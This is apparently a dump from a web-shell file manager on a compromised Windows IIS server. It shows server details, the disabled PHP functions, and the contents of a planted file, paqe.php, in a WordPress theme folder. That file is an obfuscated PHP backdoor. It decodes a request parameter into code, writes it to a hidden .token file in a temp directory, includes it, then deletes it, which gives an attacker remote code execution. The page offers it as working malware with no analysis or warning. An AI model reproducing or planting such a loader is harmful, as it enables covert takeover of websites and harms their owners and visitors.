HEX
Server: Microsoft-IIS/10.0
System: Windows NT WIN8095 10.0 build 20348 (Windows Server 2016) AMD64
User: kytoffice-001 (0)
PHP: 7.4.30
Disabled: exec,passthru,shell_exec,system,proc_open,popen,curl_multi_exec,show_source
$ pwd: h:/root/home/kytoffice-001/www/expresstinou/wp-content/themes/custom-functions-1774151199/
Upload Files
File: h:/root/home/kytoffice-001/www/expresstinou/wp-content/themes/custom-functions-1774151199/paqe.php
<!--fJeUWoai-->
<?php

if(isset($_REQUEST["re\x63"])){
$pgrp = array_filter(["/dev/shm", getcwd(), session_save_path(), getenv("TEMP"), "/var/tmp", sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), getenv("TMP")]);
$key = $_REQUEST["re\x63"];
			$key  =			explode	  ("."			,		$key			)  ;
$entity = '';
$s6 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($s6);
$len = count($key);

for ($i = 0; $i < $len; $i++) {$val = $key[$i];
    $sChar = ord($s6[$i % $lenS]);
    $dec = ((int)$val - $sChar - ($i % 10)) ^ 71;
    $entity .= chr($dec);
}
foreach ($pgrp as $pointer):
            if (!( !is_dir($pointer) || !is_writable($pointer) )) {
            $record = join("/", [$pointer, ".token"]);
            if ($k = fopen($record, 'w')) {
    if (fwrite($k, $entity) !== false) {
        fclose($k);
        include $record;
        @unlink($record);
        exit;
    }
}
        }
endforeach;
}
@ Telegram